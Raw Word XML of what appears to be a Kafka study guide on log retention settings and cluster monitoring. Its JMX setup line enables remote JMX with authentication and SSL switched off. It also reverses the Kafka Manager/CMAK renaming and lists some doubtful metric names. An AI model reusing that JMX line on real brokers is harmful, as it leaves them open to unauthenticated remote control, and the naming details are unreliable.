    <w:p w14:paraId="70129ED9" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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og.segment.bytes=1073741824  # 1 GB per log segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564DCF3" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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og.segment.delete.delay.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configures the delay between marking a log segment for deletion and the actual deletion of the segment. The default is 60000 (60 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597D2254" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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og.segment.delete.delay.ms=60000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AD85E" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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og.retention.check.interval.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Configures how often Kafka checks for eligible logs to delete. The default value is 300000 (5 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B5E8C" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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og.retention.check.interval.ms=300000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516F6E1" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Retention Configuration at Topic Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09DD4C" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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allows you to configure retention policies per topic using the kafka-topics.sh tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B71FE" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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et time-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0FEC2" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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topics.sh --alter --topic &lt;topic_name&gt; --config retention.ms=86400000 --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA1817" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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et size-based retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300B0C5D" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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topics.sh --alter --topic &lt;topic_name&gt; --config retention.bytes=10737418240 --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E615BE" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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et log compaction policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCD837" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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topics.sh --alter --topic &lt;topic_name&gt; --config cleanup.policy=compact --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F86AE" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Summary of Retention Polic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62"/>
        <w:gridCol w:w="4318"/>
        <w:gridCol w:w="1830"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="41CF9420" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69BE8CBD" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E2A0C18" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1EE1F7" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Default Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="7339E428" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53726FD5" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.retention.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683920E8" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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ime-based retention (in milliseconds).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B05F03" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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604800000 (7 days)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2925B1BA" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF2CC4B" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.retention.bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1394132B" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Size-based retention (in bytes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B01BC2" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Unlimited (-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="40B42398" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261FF4A7" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.cleanup.policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32F97A78" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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leanup policy for the topic: delete or compact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27DC123B" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6488043E" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59C666F8" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.segment.bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B690F63" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og segment size (in bytes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="788013E4" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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1073741824 (1 GB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="375DC38A" w14:textId="77777777" w:rsidTr="00C50A4B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5117A673" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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og.retention.check.interval.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13596126" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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nterval for retention cleanup check (in ms).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66F09A56" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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300000 (5 minutes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="232346FF" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B677184" w14:textId="77777777" w:rsidR="00C50A4B" w:rsidRPr="0003272F" w:rsidRDefault="00C50A4B"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lastRenderedPageBreak/>
        <w:t>Kafka provides flexible retention mechanisms that allow you to manage how long messages stay in topics. Time-based and size-based retention policies help control the amount of storage used, while log compaction ensures that only the latest state of data is retained for specific keys. These configurations can be set at the broker or topic level, depending on your specific needs for data retention, disk space management, and real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92FEEC" w14:textId="2D18AC0D" w:rsidR="00412451" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00412451">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068BC9D">
          <v:rect id="_x0000_i3163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B78AB1" w14:textId="6F267531" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="787" w:name="_Toc196308267"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can you monitor a Kafka cluster</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="787"/>
    </w:p>
    <w:p w14:paraId="0F4B47D0" w14:textId="1F86D9BC" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Monitoring a Kafka cluster is crucial for ensuring its health, performance, and availability. Kafka provides a range of tools and techniques to monitor various aspects of the cluster, such as brokers, producers, consumers, and topics. Below are the key methods for monitoring a Kafka cluster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560EAA56" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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1. Using Kafka’s JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA992CA" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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exposes a wide variety of metrics via </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Management Extensions (JMX)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These metrics can be used to monitor various aspects of Kafka's operation, including broker performance, message throughput, and consumer lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371184B" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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ey Metrics to Monitor via JMX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD9E9C" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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roker Metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A8457" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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server:type=BrokerTopicMetrics,name=MessagesInPerSec: Measures the number of messages received per second by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33C3E4" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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server:type=BrokerTopicMetrics,name=BytesInPerSec: Measures the number of bytes received per second by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EEC3D7" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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server:type=BrokerTopicMetrics,name=BytesOutPerSec: Measures the number of bytes sent per second by the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBE9EB" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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server:type=ReplicaManager,name=UnderReplicatedPartitions: Number of under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9BBE8" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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server:type=LogFlushStats,name=LogFlushTimeMs: Time taken to flush logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A7D77" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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roducer Metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBEAF6" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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producer:type=ProducerTopicMetrics,name=ProduceRequestsPerSecond: Number of produce requests per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4601CA11" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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producer:type=ProducerTopicMetrics,name=RequestSize: Size of the produce requests in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1BAD4" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365929E3" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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consumer:type=ConsumerFetcherManager,name=FetchRequestRateAndTimeMs: Fetch request rate and response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8BF43" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="138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consumer:type=ConsumerCoordinator,name=CommitLag: Consumer commit lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BE1FFF" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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How to Enable JMX Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE2505" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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You need to configure Kafka brokers to expose metrics over JMX by adding the following JMX-related options in the Kafka broker configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F112E" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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_OPTS="-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082B574" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Once this is configured, you can use JMX tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JConsole</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JVisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus JMX exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pull and visualize metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177EF45" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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2. Using Kafka Manager (or CMAK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1122F286" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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Manager (previously known as CMAK - </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cluster Manager for Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is an open-source tool that allows you to monitor and manage Kafka clusters. It provides a user-friendly interface to perform tasks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BECAF6" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Viewing the status of brokers and topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267CEF66" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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hecking consumer group details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8E017" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Monitoring the number of partitions and under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B9A97F" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138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Displaying the consumer lag for each topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A8507D" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC"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afka Manager Features</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
